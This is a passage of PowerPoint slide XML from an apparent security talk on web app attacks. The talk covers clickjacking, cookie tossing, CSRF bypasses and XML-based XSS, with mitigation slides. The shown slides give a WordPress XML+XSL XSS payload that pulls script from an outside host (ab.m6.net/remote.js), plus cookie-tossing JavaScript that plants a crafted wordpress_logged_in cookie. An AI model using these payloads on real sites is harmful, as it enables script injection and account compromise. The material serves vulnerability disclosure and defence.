                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="240000">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="400"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="600"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="120000">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="800"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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4" grpId="0"/>
      <p:bldP spid="6164"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5400" y="1219200"/>
            <a:ext cx="3962400" cy="426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Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1219200"/>
            <a:ext cx="4114800" cy="426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274638"/>
            <a:ext cx="8229600" cy="944562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Exploit - Cross-Site Scripting using XML+XSL Pair</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="4038600" cy="3581400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> &lt;?xml version="1.0" encoding="utf-8" ?&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>xsl:stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>xsl:template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> match="/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>  &lt;h3&gt;got it!!!!!&lt;/h3&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>&lt;marquee </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>onstart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>="document['write']('\x3cscr'+'ipt language=\'JavaScript\' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>=\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>'http://ab.m6.net/remote.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>\'\x3e\x3c/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>ript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>\x3e')"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Nooooooooooooooooooooooooooooooooooooooooooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>!&lt;/marquee&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>xsl:template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>xsl:stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="1600201"/>
            <a:ext cx="4038600" cy="2895600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>&lt;?xml-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t> type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1"/>
              <a:t>xsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>wostest42.files.wordpress.com/2011/05/badxsl.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&lt;document&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>x name="x"&gt;x&lt;/x&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>&lt;/document&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5659973"/>
            <a:ext cx="1828800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>badxsl.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="5673828"/>
            <a:ext cx="1404257" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>foo.wxr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162662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769"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Exploit - Remote.js Cookie Tossing Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796636" y="1600200"/>
            <a:ext cx="7239000" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alert('Cookie Tossing brought to you by BEST!');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>wordpress_logged_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\&lt;/script\&gt;\&lt;script\&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)\&lt;/script\&gt;; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>path=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>domain=.wordpress.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; expires=Wed, 16-Nov-2012 22:38:05 GMT;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://besttest42.wordpress.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-admin/media-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>new.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296944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09600" y="1828800"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Let’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>lend it, shall we?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4054593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TaxKeywordTaxHTField xmlns="230e9df3-be65-4c73-a93b-d1236ebd677e">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71EF78F52E3942BDCB384E939F952C" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="733c9fcdab8ef08c490fc5d5bc1740b7">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="230e9df3-be65-4c73-a93b-d1236ebd677e" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="8966389804cdf63a5c80fae46a073d10" ns2:_="">
    <xsd:import namespace="230e9df3-be65-4c73-a93b-d1236ebd677e"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:TaxKeywordTaxHTFiel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b25c919a-a27e-4ee2-89b3-29865b21538d}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="2b83dd4b-e772-4d14-9339-dd5fb6c6eba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b25c919a-a27e-4ee2-89b3-29865b21538d}" ma:internalName="TaxCatchAllLabel" ma:readOnly="true" ma:showField="CatchAllDataLabel" ma:web="2b83dd4b-e772-4d14-9339-dd5fb6c6eb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350160-B638-4ADC-BB43-63460B9D023E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{579D26F7-FE32-454D-B7F6-A09FC9193936}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/term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230e9df3-be65-4c73-a93b-d1236ebd677e"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{818D2002-517E-4D8B-ABA7-B1284F13A3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Horizon</Template>
  <TotalTime>0</TotalTime>
  <Words>3202</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>446</Paragraphs>
  <Slides>110</Slides>
  <Notes>55</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>4</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Office Theme</vt:lpstr>
      <vt:lpstr>New Ways I’m Going to Hack Your Web App</vt:lpstr>
      <vt:lpstr>Hi</vt:lpstr>
      <vt:lpstr>The New Low Hanging Fruit, since we broke down and got that extension ladder</vt:lpstr>
      <vt:lpstr>Problems and Mitigations</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking is Lame</vt:lpstr>
      <vt:lpstr>Clickjacking is Lame</vt:lpstr>
      <vt:lpstr>Who Clicks on Stuff?</vt:lpstr>
      <vt:lpstr>Who Clicks on Stuff?</vt:lpstr>
      <vt:lpstr>Who Clicks on Stuff?</vt:lpstr>
      <vt:lpstr>Clickjacking Mitigations</vt:lpstr>
      <vt:lpstr>Clickjacking Mitigations</vt:lpstr>
      <vt:lpstr>JavaScript as Defense</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Now What?</vt:lpstr>
      <vt:lpstr>Stealing Someone’s Information</vt:lpstr>
      <vt:lpstr>Stealing Someone’s Information</vt:lpstr>
      <vt:lpstr>Stealing Someone’s Information</vt:lpstr>
      <vt:lpstr>Stealing Someone’s Information</vt:lpstr>
      <vt:lpstr>Meanwhile...</vt:lpstr>
      <vt:lpstr>How Was my Information Stolen?</vt:lpstr>
      <vt:lpstr>How Was my Information Stolen?</vt:lpstr>
      <vt:lpstr>How Was my Information Stolen?</vt:lpstr>
      <vt:lpstr>How Was my Information Stolen?</vt:lpstr>
      <vt:lpstr>How Was my Information Stolen?</vt:lpstr>
      <vt:lpstr>Jesse Ou asks: “What else can we do with Facebook clickjacking?”</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>Taking Over Someone’s Account</vt:lpstr>
      <vt:lpstr>To Recap</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Wall of Sheep</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookie tossing</vt:lpstr>
      <vt:lpstr>This is a Cookie String</vt:lpstr>
      <vt:lpstr>The “First Cookie” Hurdle</vt:lpstr>
      <vt:lpstr>Before we begin</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Which cookie wins?</vt:lpstr>
      <vt:lpstr>How to “Toss the Cookie” up</vt:lpstr>
      <vt:lpstr>Cookie Tossing CSRF: the Quickening</vt:lpstr>
      <vt:lpstr>The CSRF Mitigation Bypass</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Office365 CSRF Mitigation</vt:lpstr>
      <vt:lpstr>Oh, and OWA too</vt:lpstr>
      <vt:lpstr>The exploit</vt:lpstr>
      <vt:lpstr>The exploit (cont.)</vt:lpstr>
      <vt:lpstr>And here’s what’s sent to the server</vt:lpstr>
      <vt:lpstr>Exploited</vt:lpstr>
      <vt:lpstr>OWA Fix</vt:lpstr>
      <vt:lpstr>Cookie Tossing: XSS</vt:lpstr>
      <vt:lpstr>XSS Through a Cookie</vt:lpstr>
      <vt:lpstr>Cookie Name Case Insensitivityishness</vt:lpstr>
      <vt:lpstr>XSS Through a Cookie</vt:lpstr>
      <vt:lpstr>The Easy Part: XSS on a Sibling</vt:lpstr>
      <vt:lpstr>My Cookie is First!</vt:lpstr>
      <vt:lpstr>Mitigating Cookie XSS</vt:lpstr>
      <vt:lpstr>What else?</vt:lpstr>
      <vt:lpstr>What to do about cookie tossing</vt:lpstr>
      <vt:lpstr>XML Attacks</vt:lpstr>
      <vt:lpstr>XML, XML, Everywhere</vt:lpstr>
      <vt:lpstr>Wait.  Are there really features that take user-controlled XML?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What Happens if your Feature Parses Untrusted XML?</vt:lpstr>
      <vt:lpstr>A Quick Note</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting with XML</vt:lpstr>
      <vt:lpstr>What if the XML is only parsed and not stored?</vt:lpstr>
      <vt:lpstr>DTD Cross-Site Scripting Leveraging System.XML Exception Messages</vt:lpstr>
      <vt:lpstr>Technique 1 - Cross-Site Scripting using URL Fragments</vt:lpstr>
      <vt:lpstr>Technique 2 - Cross-Site Scripting using 500s</vt:lpstr>
      <vt:lpstr>What if XML can be uploaded and downloaded?</vt:lpstr>
      <vt:lpstr>Technique 3 – Cross-Site Scripting with XML+XSL pair</vt:lpstr>
      <vt:lpstr>WordPress Blended Threats Demo </vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>First, Rich Found a Cookie Based Reflected XSS</vt:lpstr>
      <vt:lpstr>Burp Found This Too…Not Exploitable, Right?</vt:lpstr>
      <vt:lpstr>Paparazzi vs. Fictional Celebrity</vt:lpstr>
      <vt:lpstr>We just need to be able to execute JavaScript in our domain and we win! But how?</vt:lpstr>
      <vt:lpstr>Problem: We can only upload “safe” media files, and the Content-Type is explicitly set when you try to download them</vt:lpstr>
      <vt:lpstr>But, there is a feature that lets you import/download your old WordPress blog in XML format (WXR file)</vt:lpstr>
      <vt:lpstr>Content-Type was not set when downloading WXR files, so IE will sniff the response, determine the file is actually XML, apply our XSL, and…. we have script executing in our own domain!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>WordPress Exploit - Cross-Site Scripting using XML+XSL Pair</vt:lpstr>
      <vt:lpstr>WordPress Exploit - Remote.js Cookie Tossing Code</vt:lpstr>
      <vt:lpstr>Let’s blend it, shall we?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Resolution with WordPress</vt:lpstr>
      <vt:lpstr>XML XSS Attack Mitigations</vt:lpstr>
      <vt:lpstr>XML XSS Attack Mitigations (Continued)</vt:lpstr>
      <vt:lpstr>XML XSS Attack Mitigations (Continued)</vt:lpstr>
      <vt:lpstr>Summing it all UP</vt:lpstr>
      <vt:lpstr>In Conclusion</vt:lpstr>
      <vt:lpstr>Getting Ahead of Vulnerabilities</vt:lpstr>
      <vt:lpstr>Any more questions?</vt:lpstr>
      <vt:lpstr>Bibliography</vt:lpstr>
      <vt:lpstr>Reminder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2011-11-04T17:48:46Z</dcterms:created>
